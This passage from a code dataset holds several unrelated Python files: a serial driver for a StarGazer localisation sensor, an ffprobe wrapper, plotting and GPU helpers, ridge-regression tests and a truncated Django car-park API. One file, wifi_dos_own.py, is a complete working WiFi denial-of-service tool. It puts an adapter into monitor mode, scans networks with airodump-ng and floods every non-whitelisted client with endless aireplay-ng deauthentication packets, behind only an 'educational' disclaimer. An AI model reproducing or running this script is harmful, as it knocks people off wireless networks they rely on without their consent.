    sys.exit(status)
| 2.390625 | 2 |
plot_log_population.py | catskillsresearch/openasr20 | 0 | 17689 | <filename>plot_log_population.py
import matplotlib.pylab as plt
def plot_log_population(population, _title, _xlabel, _ylabel, _bins):
plt.hist(population,bins=_bins)
plt.xlabel(_xlabel)
plt.ylabel(_ylabel)
plt.title(_title)
plt.yscale('log');
plt.show()
| 3 | 3 |
src/stargazer/stargazer.py | magazino/stargazer | 1 | 17690 | """
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# StarGazer serial protocol framing characters.
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates a command
CMD = '#'
# RESPONSE: char that indicates a response (acknowledgement of a command)
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
class StarGazer(object):
def __init__(self, device, marker_map, callback_global=None, callback_local=None,callback_raw=None, callback_raw_reponse=None):
"""
Connect to a Hagisonic StarGazer device and receive poses.
device: The device location for the serial connection.
marker_map: dictionary of marker transforms, formatted:
{marker_id: (4,4) matrix}
callback_global: will be called whenever a new pose is received from the
Stargazer, will be called with (n,4,4) matrix of poses
of the location of the Stargazer in the global frame.
These are computed from marker_map.
callback_local: will be called whenever a new poses is received from the
Stargazer, with a dict: {marker_id: [xyz, angle]}
"""
self.device = device
self.marker_map = marker_map
self.connection = None
# chunk_size: how many characters to read from the serial bus in
# between checking the buffer for the STX/ETX characters
self._chunk_size = 80
self._callback_global = callback_global
self._callback_local = callback_local
self._callback_raw = callback_raw
self._callback_raw_reponse = callback_raw_reponse
self._stopped = Event()
self._thread = None
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
if self.is_connected:
self.disconnect()
@property
def is_connected(self):
"""
Returns whether the driver is currently connected to a serial port.
"""
return self.connection is not None
def connect(self):
"""
Connect to the StarGazer over the specified RS-232 port.
"""
if self.is_connected:
self.disconnect()
self.connection = Serial(port=self.device, baudrate=115200, timeout=1.0)
if self.connection is None:
return False
return True
def disconnect(self):
"""
Disconnects from the StarGazer and closes the RS-232 port.
"""
if self.is_connected:
self.connection.close()
self.connection = None
if self.connection is None:
return True
return False
@property
def is_streaming(self):
"""
Returns whether the driver is currently streaming pose data.
"""
return self._thread is not None
def start_streaming(self):
"""
Begin streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('CalcStart')
if success:
self._thread = Thread(target=self._read, args=()).start()
return success
def stop_streaming(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected
if self.is_streaming:
self._stopped.set()
self._thread.join()
success = self._send_command('CalcStop')
return success
def reset_parameters(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('Reset')
return success
def set_parameter(self, name, value):
"""
Set a StarGazer configuration parameter.
This function can only be called while the StarGazer is
connected, but not streaming.
Arguments
---------
name: string name of the parameter to set
value: string value of the parameter to set
Example
-------
set_parameter('MarkType', 'HLD1L')
"""
assert self.is_connected and not self.is_streaming
success = self._send_command(name, value)
return success
def get_parameter(self, name):
pass
def _send_command(self, *args):
"""
Send a command to the StarGazer.
Arguments
---------
command: string, or list. If string of single command, send just that.
if list, reformat to add delimiter character
Example
-------
_send_command('CalcStop')
_send_command('MarkType', 'HLD1L')
"""
success = True
delimited = DELIM.join(str(i) for i in args)
if 'SetEnd' in delimited:
delimited = 'SetEnd'
command_str = STX + CMD + delimited + ETX
rospy.loginfo('Sending command to StarGazer: %s', command_str)
# The StarGazer requires a 50 ms delay between each byte.
for ch in command_str:
self.connection.write(ch)
time.sleep(0.05)
response_expected = STX + RESPONSE + delimited + ETX
success = self._read_response(response_expected)
if success and ('SetEnd' in response_expected):
response_expected = STX + RESPONSE + 'ParameterUpdate' + ETX
time.sleep(1.0)
success = self._read_response(response_expected)
if(success):
rospy.loginfo('Parameters update successful')
return success
def _read_response(self, response_expected):
success = True
try:
response_actual = self.connection.read(len(response_expected))
except Exception as e:
rospy.logwarn(str(e))
sucess = False
return success
# Scan for more incoming characters until we get a read timeout.
# (This is useful if there is still some incoming data from previous
# commands in intermediate serial buffers.)
while response_actual[-len(response_expected):] != response_expected:
c = None
try:
c = self.connection.read()
except Exception as e:
rospy.logwarn(str(e))
return success
if c:
# Add new characters to the response string.
response_actual += c
else:
rospy.logwarn('Received invalid response {%s} expected "{%s}'% \
(response_actual, response_expected))
success = False
break
'''
# If we run out of characters and still don't match, report
# the invalid response as an exception.
raise Exception(
'Command "{:s}" received invalid response "{:s}"; '
'expected "{:s}".'
.format(command_str, response_actual, response_expected)
)
'''
print response_actual
if self._callback_raw_reponse:
self._callback_raw_reponse(response_actual)
return success
def _read(self):
    """
    Read from the serial connection to the StarGazer, process buffer,
    then execute callbacks.
    """
    # Compute a regular expression that returns the last valid
    # message in a StarGazer stream.
    # STX/ETX are the module-level start/end-of-message framing characters.
    msg_pattern = ('.*' + STX + '(?P<type>.)(?P<payload>.+)' + ETX +
                   '(?P<remainder>.*)$')
    msg_matcher = re.compile(msg_pattern)
    # Compute a regular expression that converts a StarGazer message
    # into a list of tuples containing parsed groups.
    delimiter = '\\' + DELIM
    number = '[\d\+\-\.]'
    tag_pattern = (r'(?P<id>\d+)' + delimiter +
                   r'(?P<yaw>' + number + '+)' + delimiter +
                   r'(?P<x>' + number + '+)' + delimiter +
                   r'(?P<y>' + number + '+)' + delimiter +
                   r'(?P<z>' + number + '+)')
    tag_matcher = re.compile(tag_pattern)

    def process_buffer(message_buffer):
        """
        Looks at current message_buffer string for STX and ETX chars.
        Proper behavior is to process string found between STX/ETX for poses
        and remove everything in the buffer up the last observed ETX.
        Valid readings:
            ~^148|-175.91|+98.74|+7.10|182.39`
            ~^248|-176.67|+98.38|+8.39|181.91|370|-178.41|-37.05|+8.97|179.51`
        No valid readings:
            ~*DeadZone`
        """
        # Look for a matching message, return the buffer if none are found.
        message = msg_matcher.match(message_buffer)
        if not message:
            return message_buffer
        if message.group('type') == RESULT:
            markers = tag_matcher.finditer(message.group('payload'))
            local_poses = {}
            raw_poses = []
            for marker in markers:
                # Parse pose information for this marker.
                _id = marker.group('id')
                # Yaw is negated and converted to radians; x/y cm -> metres.
                yaw = -np.radians(float(marker.group('yaw')))
                x = 0.01 * float(marker.group('x'))
                y = 0.01 * float(marker.group('y'))
                # Note: this axis is negated.
                z = 0.0  # -0.01 * float(marker.group('z'))
                raw_pose = [_id, x, y, 0, -yaw]
                raw_poses.append(raw_pose)
                # Convert the pose to a transform and store it by ID.
                # The inverse gives the StarGazer's pose in the marker frame.
                marker_to_stargazer = fourdof_to_matrix((x, y, z), yaw)
                local_poses[_id] = np.linalg.inv(marker_to_stargazer)
            # Fire whichever callbacks the user registered.
            if self._callback_raw:
                self._callback_raw(raw_poses)
            if self._callback_local:
                self._callback_local(local_poses)
            if self._callback_global:
                global_poses, unknown_ids = local_to_global(self.marker_map,
                                                            local_poses)
                self._callback_global(global_poses, unknown_ids)
        elif message.group('type') == NOTIFY:
            # TODO: Report deadzone messages in here!
            pass
        else:
            pass
        # Return the rest of the message buffer.
        return message.group('remainder')

    rospy.loginfo('Entering read loop.')
    message_buffer = ''
    # Keep reading fixed-size chunks until a stop is requested or the
    # connection goes away.
    while not self._stopped.is_set() and self.connection:
        try:
            message_buffer += self.connection.read(self._chunk_size)
            message_buffer = process_buffer(message_buffer)
        except Exception as e:
            rospy.logwarn('Error processing current buffer: %s (content: "%s")',
                          str(e), message_buffer
                          )
            message_buffer = ''
            break  # For debugging purposes.
    rospy.loginfo('Exited read loop.')
def close(self):
    """Stop the StarGazer's pose calculation and close the serial port."""
    # Signal the background read loop to exit before tearing things down.
    self._stopped.set()
    self._send_command('CalcStop')
    self.connection.close()
def local_to_global(marker_map, local_poses):
    """
    Transform local marker coordinates to map coordinates.

    marker_map:  dict mapping marker id -> 4x4 marker-to-map transform
    local_poses: dict mapping marker id -> 4x4 pose observed locally

    Returns (global_poses, unknown_ids): global_poses maps each known id
    to its 4x4 local-to-map transform; unknown_ids is the set of observed
    ids missing from marker_map.
    """
    global_poses = dict()
    unknown_ids = set()
    # .items() instead of the Python-2-only .iteritems(): works under both
    # Python 2 and Python 3.
    for _id, pose in local_poses.items():
        if _id in marker_map:
            marker_to_map = marker_map[_id]
            local_to_marker = np.linalg.inv(pose)
            local_to_map = np.dot(marker_to_map, local_to_marker)
            global_poses[_id] = local_to_map
        else:
            unknown_ids.add(_id)
    return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
    """
    Convert from a Cartesian translation and yaw to a homogeneous transform.
    """
    # Start from a pure rotation about +Z, then fill in the translation
    # column of the 4x4 homogeneous matrix.
    transform = transformations.rotation_matrix(yaw, [0, 0, 1])
    transform[:3, 3] = translation
    return transform
def _callback_dummy(data):
return
def _callback_print(data):
    """Debugging callback: echo the received data to stdout."""
    print(data)
| 2.65625 | 3 |
example.py | karishmashuklaa/flatifyLists | 0 | 17691 | from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example)) | 2.78125 | 3 |
pympeg/_probe.py | AP-Atul/pympeg | 5 | 17692 | <reponame>AP-Atul/pympeg<filename>pympeg/_probe.py
import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
    """Run ffprobe on the given file and return its JSON output as a dict.

    Args:
        filename: path of the media file to inspect.
        cmd: probe executable to invoke (defaults to ffprobe).
        timeout: optional seconds to wait for the subprocess.

    Raises:
        FileExistsError: if `filename` does not exist.  NOTE(review): the
            semantically correct type would be FileNotFoundError, but the
            raised type is kept so existing callers' except clauses work.
        ProbeException: if ffprobe exits with a non-zero status.
    """
    if not os.path.isfile(filename):
        # Bug fix: the f-string previously interpolated nothing, so the
        # offending path never appeared in the error message.
        raise FileExistsError(f"Input file {filename} does not exist.")

    args = [cmd, '-show_format', '-show_streams', '-of', 'json']
    args += [filename]

    p = subprocess.Popen(
        args,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )

    communicate_kwargs = {}
    if timeout is not None:
        communicate_kwargs['timeout'] = timeout
    out, err = p.communicate(**communicate_kwargs)

    if p.returncode != 0:
        raise ProbeException('ffprobe', out, err)
    return json.loads(out.decode('utf-8'))
| 2.65625 | 3 |
example/func_doc.py | tinashime/Python27 | 0 | 17693 | def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
print x,'is maximun'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
| 4.15625 | 4 |
wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 1,353 | 17694 | <filename>wifi_dos_own.py
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
    """Exit the program unless it was launched via sudo.

    sudo sets the SUDO_UID environment variable; its absence means we lack
    the root privileges the networking commands in this script require.
    """
    # Idiom fix: test membership directly on os.environ (no .keys() needed).
    if 'SUDO_UID' not in os.environ:
        print("Try running this program with sudo.")
        exit()
def find_nic():
    """This function is used to find the network interface controllers on your computer."""
    # "iw dev" lists wireless devices; pull the interface names (wlanX)
    # out of its output with the module-level wlan_code regex.
    output = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
    return wlan_code.findall(output)
def set_monitor_mode(controller_name):
    """This function needs the network interface controller name to put it into monitor mode.
    Argument: Network Controller Name"""
    # Bug fix: the body previously ignored `controller_name` and used the
    # module-level `wifi_name` global; it now operates on its argument.
    # Take the interface down before changing its mode.
    subprocess.run(["ip", "link", "set", controller_name, "down"])
    # Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
    subprocess.run(["airmon-ng", "check", "kill"])
    # Put the WiFi nic in monitor mode.
    subprocess.run(["iw", controller_name, "set", "monitor", "none"])
    # Bring the WiFi controller back online.
    subprocess.run(["ip", "link", "set", controller_name, "up"])
def set_band_to_monitor(choice):
    """If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
    # Map the menu choice onto airodump-ng's --band argument:
    # "0" -> b/g (2.4GHz), "1" -> a (5GHz), anything else -> full spectrum.
    band = {"0": "bg", "1": "a"}.get(choice, "abg")
    subprocess.Popen(
        ["airodump-ng", "--band", band, "-w", "file", "--write-interval", "1",
         "--output-format", "csv", wifi_name],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
    """Move all .csv files in the current directory into ./backup,
    prefixing each filename with a timestamp so runs never overwrite."""
    for file_name in os.listdir():
        # We should only have one csv file as we delete them from the folder
        # every time we run the program.
        if ".csv" in file_name:
            print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
            # We get the current working directory.
            directory = os.getcwd()
            try:
                # We make a new directory called /backup
                os.mkdir(directory + "/backup/")
            except FileExistsError:
                # Narrowed from a bare except: only "already exists" is
                # expected here; other OS errors should surface.
                print("Backup folder exists.")
            # Create a timestamp
            timestamp = datetime.now()
            # We copy any .csv files in the folder to the backup folder.
            shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
    """Return True when `essid` is not already present in any entry of `lst`.

    `lst` holds airodump-ng csv rows (dicts with an "ESSID" key); the caller
    uses the result to decide whether to append a newly seen network.
    Note: membership uses substring matching, mirroring the original logic,
    and an empty list yields True (nothing seen yet).
    """
    # all() over an empty list is True, which replaces the explicit
    # len(lst) == 0 early return of the original.
    return all(essid not in item["ESSID"] for item in lst)
def wifi_networks_menu():
    """ Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
    active_wireless_networks = list()
    try:
        while True:
            # We want to clear the screen before we print the network interfaces.
            subprocess.call("clear", shell=True)
            for file_name in os.listdir():
                # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
                # The following list contains the field names for the csv entries.
                fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
                if ".csv" in file_name:
                    with open(file_name) as csv_h:
                        # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
                        # This creates a list of dictionaries with the keys as specified in the fieldnames.
                        csv_h.seek(0)
                        csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
                        for row in csv_reader:
                            # Skip the repeated header row, stop once the
                            # client ("Station MAC") section begins, and
                            # de-duplicate networks by ESSID.
                            if row["BSSID"] == "BSSID":
                                pass
                            elif row["BSSID"] == "Station MAC":
                                break
                            elif check_for_essid(row["ESSID"], active_wireless_networks):
                                active_wireless_networks.append(row)
            print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
            print("No |\tBSSID |\tChannel|\tESSID |")
            print("___|\t___________________|\t_______|\t______________________________|")
            for index, item in enumerate(active_wireless_networks):
                # We're using the print statement with an f-string.
                # F-strings are a more intuitive way to include variables when printing strings,
                # rather than ugly concatenations.
                print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
            # We make the script sleep for 1 second before loading the updated list.
            time.sleep(1)
    except KeyboardInterrupt:
        print("\nReady to make choice.")
    # Ensure that the input choice is valid.
    # NOTE(review): a non-numeric or out-of-range entry raises here instead
    # of re-prompting; consider wrapping the lookup in try/except.
    while True:
        net_choice = input("Please select a choice from above: ")
        if active_wireless_networks[int(net_choice)]:
            return active_wireless_networks[int(net_choice)]
        print("Please try again.")
def set_into_managed_mode(wifi_name):
    """SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
    ARGUMENTS: wifi interface name
    """
    # Same sequence as before: interface down -> managed mode -> up,
    # then hand control back to NetworkManager.
    for command in (
        ["ip", "link", "set", wifi_name, "down"],
        ["iwconfig", wifi_name, "mode", "managed"],
        ["ip", "link", "set", wifi_name, "up"],
        ["service", "NetworkManager", "start"],
    ):
        subprocess.run(command)
def get_clients(hackbssid, hackchannel, wifi_name):
    """Start airodump-ng in the background, locked to the target BSSID and
    channel, logging connected clients to clients*.csv once per second."""
    subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
    """Continuously deauthenticate target_mac from network_mac via aireplay-ng."""
    # We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
    # Then we also need to specify the interface
    subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
# NOTE(review): this MAC pattern is permissive -- each colon is optional, so
# it also matches 12 bare hex digits; good enough for parsing user input here.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
# Captures wireless interface names (wlan0, wlan1, ...) from "iw dev" output.
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of <NAME>, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
# Loops until the user supplies at least one valid MAC address.
while True:
    print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
    macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
    # Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
    macs_not_to_kick_off = mac_address_regex.findall(macs)
    # We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
    macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
    # If you entered a valid MAC Address the program flow will continue and break out of the while loop.
    if len(macs_not_to_kick_off) > 0:
        break
    print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
    wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
    print("Please select the type of scan you want to run.")
    for index, controller in enumerate(wifi_controller_bands):
        print(f"{index} - {controller}")
    # Check if the choice exists. If it doesn't it asks the user to try again.
    # We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
    band_choice = input("Please select the bands you want to scan from the list above: ")
    try:
        if wifi_controller_bands[int(band_choice)]:
            # Since the choice exists and is an integer we can cast band choice as an integer.
            band_choice = int(band_choice)
            break
    except:
        # NOTE(review): bare except hides real errors; catching
        # (ValueError, IndexError) would be safer.
        print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
    # If no networks interface controllers connected to your computer the program will exit.
    print("Please connect a network interface controller and try again!")
    exit()
# Select the network interface controller you want to put into monitor mode.
# Re-prompts on invalid input (int() or index lookup failing).
while True:
    for index, controller in enumerate(network_controllers):
        print(f"{index} - {controller}")
    controller_choice = input("Please select the controller you want to put into monitor mode: ")
    try:
        if network_controllers[int(controller_choice)]:
            break
    except:
        print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
# The interactive scan above yields the target network's csv row.
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
    while True:
        count = 0  # NOTE(review): unused; kept for compatibility.
        # We want to clear the screen before we print the network interfaces.
        subprocess.call("clear", shell=True)
        for file_name in os.listdir():
            # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
            # The following list contains the field names for the csv entries.
            fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
            if ".csv" in file_name and file_name.startswith("clients"):
                with open(file_name) as csv_h:
                    print("Running")
                    # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
                    # This creates a list of dictionaries with the keys as specified in the fieldnames.
                    csv_h.seek(0)
                    csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
                    for index, row in enumerate(csv_reader):
                        # The first rows of airodump-ng's csv are preamble,
                        # not client entries, so skip them.
                        if index < 5:
                            pass
                        # We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
                        elif row["Station MAC"] in macs_not_to_kick_off:
                            pass
                        else:
                            # Add all the active MAC Addresses.
                            active_clients.add(row["Station MAC"])
        print("Station MAC |")
        print("______________________|")
        for item in active_clients:
            # We're using the print statement with an f-string.
            # F-strings are a more intuitive way to include variables when printing strings,
            # rather than ugly concatenations.
            print(f"{item}")
            # Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
            if item not in threads_started:
                # It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
                threads_started.append(item)
                # We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
                # A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
                t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
                t.start()
except KeyboardInterrupt:
    print("\nStopping Deauth")

# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
| 2.96875 | 3 |
lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 0 | 17695 | <reponame>ritwik12/lightwood
import subprocess
def get_gpu_memory_map():
    '''
    Keys are device ids as integers.
    Values are memory usage as integers in MB.
    '''
    # Query nvidia-smi for per-GPU used memory; the chosen format prints one
    # plain number per line, one line per device.
    output = subprocess.check_output(
        [
            'nvidia-smi', '--query-gpu=memory.used',
            '--format=csv,nounits,noheader'
        ], encoding='utf-8')
    # Device ids are simply line positions in the nvidia-smi output.
    return {device: int(used)
            for device, used in enumerate(output.strip().split('\n'))}
def print_gpuutil_status():
    """Print current GPU utilization via the third-party GPUtil package."""
    # Imported lazily so this module loads even when GPUtil is not installed.
    import GPUtil
    GPUtil.showUtilization()
| 3.015625 | 3 |
optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | 0 | 17696 | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
    """Attach deterministic ridge-regression fixtures (hparams, w, x, y) to `cls`."""
    # Fixed seeds make the hard-coded reference values in the tests below
    # reproducible.
    np.random.seed(1234)
    torch.manual_seed(1234)
    n_features = 3
    n_samples = 5
    mu = 0.02
    cls.hparams = Container(n_features=n_features,
                            n_samples=n_samples,
                            mu=mu)
    # NOTE: the order of these randn calls matters for reproducibility.
    cls.w = torch.randn(n_features, 1, requires_grad=True)
    cls.x = torch.randn(n_samples, n_features)
    cls.y = torch.randn(n_samples)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
    """Checks Ridge_ClosedForm's task error and closed-form oracle against
    reference values precomputed for the seeded fixtures from _init_ridge."""

    def setUp(self):
        _init_ridge(self)
        self.obj = Ridge_ClosedForm(self.hparams)

    def test_error(self):
        # Reference value precomputed for the seeded fixtures.
        error_test = self.obj.task_error(self.w, self.x, self.y)
        error_ref = torch.tensor(1.3251)
        assert_all_close(error_test, error_ref, "task_error returned value")

    def test_oracle(self):
        # The closed-form oracle returns the analytic solution and objective.
        oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
        oracle_info_ref = {
            'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
            'obj': torch.tensor(1.3370)}
        assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
    """Checks Ridge_Gradient's task error and gradient oracle against
    reference values precomputed for the seeded fixtures from _init_ridge."""

    def setUp(self):
        _init_ridge(self)
        self.obj = Ridge_Gradient(self.hparams)

    def test_error(self):
        error_test = self.obj.task_error(self.w, self.x, self.y)
        error_ref = torch.tensor(1.3251)
        assert_all_close(error_test, error_ref, "task_error returned value")

    def test_oracle(self):
        # The gradient oracle returns the gradient 'dw' and the objective.
        oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
        oracle_info_ref = {
            'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
            'obj': torch.tensor(1.3370)}
        assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
if __name__ == '__main__':
    # Pass sys.argv through so unittest CLI flags keep working.
    unittest.main(argv=argv)
| 2.5625 | 3 |
app/parking/views.py | zollf/CITS3200 | 0 | 17697 | <filename>app/parking/views.py
from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carparks_list(request):
    """GET: list all car parks.  POST: create a car park, or update one when
    a 'pk' is supplied; optionally redirects (admin form flow)."""
    if request.method == 'GET':
        data = CarPark.objects.all()
        serializer = CarParkSerializer(data, context={'request': request}, many=True)
        return Response(serializer.data)
    elif request.method == 'POST':
        # A 'pk' in the payload means "update existing", otherwise "create".
        if 'pk' in request.data:
            carpark = CarPark.objects.get(pk=request.data['pk'])
            serializer = CarParkSerializer(carpark, data=request.data)
        else:
            serializer = CarParkSerializer(data=request.data)
        if not serializer.is_valid():
            # Admin form flow: stash human-readable errors in the session and
            # bounce back to the form instead of returning JSON.
            if 'redirect' in request.data:
                errors = [str(error[1][0]).replace("this field", error[0]) for error in serializer.errors.items()]
                if 'pk' in request.data:
                    request.session["edit_carpark_errors"] = errors
                    return redirect(f"/admin/carparks/view/{request.data.get('pk', '')}")
                else:
                    request.session["new_carpark_errors"] = errors
                    return redirect(f"/admin/carparks/add")
            return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        if 'redirect' in request.data:
            return redirect(request.data['redirect'])
        return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carpark_detail(request, pk):
    """Retrieve (GET), update (PUT) or delete (DELETE) a single car park."""
    try:
        carpark = CarPark.objects.get(pk=pk)
    except CarPark.DoesNotExist:
        return HttpResponse(status=status.HTTP_404_NOT_FOUND)

    if request.method == 'GET':
        serializer = CarParkSerializer(carpark)
        return JsonResponse(serializer.data)
    elif request.method == 'PUT':
        # Full-object update: the parsed body replaces the record.
        carpark_data = JSONParser().parse(request)
        serializer = CarParkSerializer(carpark, data=carpark_data)
        if serializer.is_valid():
            serializer.save()
            return JsonResponse(serializer.data)
        return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        carpark.delete()
        return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carbay_list(request):
    """GET: list all car bays.  POST: create a bay, or update one when a
    'pk' is supplied; optionally redirects (admin form flow)."""
    if request.method == 'GET':
        data = CarBay.objects.all()
        serializer = CarBaySerializer(data, context={'request': request}, many=True)
        return Response(serializer.data)
    elif request.method == 'POST':
        # A 'pk' means "update existing bay"; the local name `carpark` is
        # historic -- it actually holds a CarBay instance.
        if 'pk' in request.data:
            carpark = CarBay.objects.get(pk=request.data['pk'])
            serializer = CarBaySerializer(carpark, data=request.data)
        else:
            serializer = CarBaySerializer(data=request.data)
        if not serializer.is_valid():
            if 'redirect' in request.data:
                # Admin form flow: human-readable errors go into the session.
                request.session["bay_errors"] = [str(error[1][0]).replace("this field", error[0])
                                                 for error in serializer.errors.items()]
